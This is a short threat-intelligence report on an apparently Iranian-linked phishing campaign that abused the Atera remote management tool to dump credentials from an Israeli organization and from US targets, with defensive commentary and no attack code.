Sophos MDR recently uncovered a new cyber campaign utilizing targeted phishing tactics to lure victims into downloading a seemingly legitimate remote machine management tool as a means to extract credentials. This operation, identified by Sophos as STAC 1171, has been linked with moderate confidence to an Iranian threat group known as MuddyWater or TA450.
The initial incident was flagged by Sophos endpoint behavioral rules in November when credential dumping activity was detected, targeting an organization based in Israel. Analysis of the attack revealed indicators and Tactics, Techniques, and Procedures (TTPs) that aligned with findings reported by Proofpoint regarding TA450. The initial point of entry for this attack was a phishing email that prompted the recipient to open a shared document hosted at a suspicious link and download a file named ‘New Program ICC LTD.zip’.
Within the compressed archive file, a legitimate remote monitoring and management (RMM) tool called Atera was found. The installation of Atera utilized a trial account linked to an email that had likely been compromised. Upon the installation of the Atera Agent, threat actors leveraged remote run commands within Atera to execute a PowerShell script (a.ps1), aimed at extracting credentials and generating a backup file of the SYSTEM registry hive. Fortunately, Sophos behavioral rules were able to intercept and block the credential dumping activity.
In addition to credential dumping, post-compromise actions within Atera included various domain enumeration commands, an attempt to establish an SSH tunnel to 51.16.209[.]105, and an obfuscated PowerShell command used to fetch the Level RMM tool from a specific link.
Further investigation revealed similar activity among Sophos non-MDR customers in the United States, indicating a widespread threat posed by this campaign. The Sophos X-Ops team will continue to closely monitor these developments and provide updates on any new information pertaining to this particular threat cluster.
The use of legitimate tools and tactics in cyber attacks continues to pose a significant challenge for organizations globally. By blending in with common software and services, threat actors can easily evade detection and amplify the impact of their malicious activities. It is crucial for businesses to remain vigilant, enhance their cybersecurity defenses, and stay informed about emerging threat actors and their modus operandi.
As cyber threats evolve and become more sophisticated, collaboration between security vendors, organizations, and law enforcement agencies is paramount to effectively combatting malicious actors and safeguarding sensitive data. By staying ahead of emerging threats and investing in robust cybersecurity measures, businesses can minimize the risk of falling victim to such malicious campaigns and protect their valuable assets from compromise.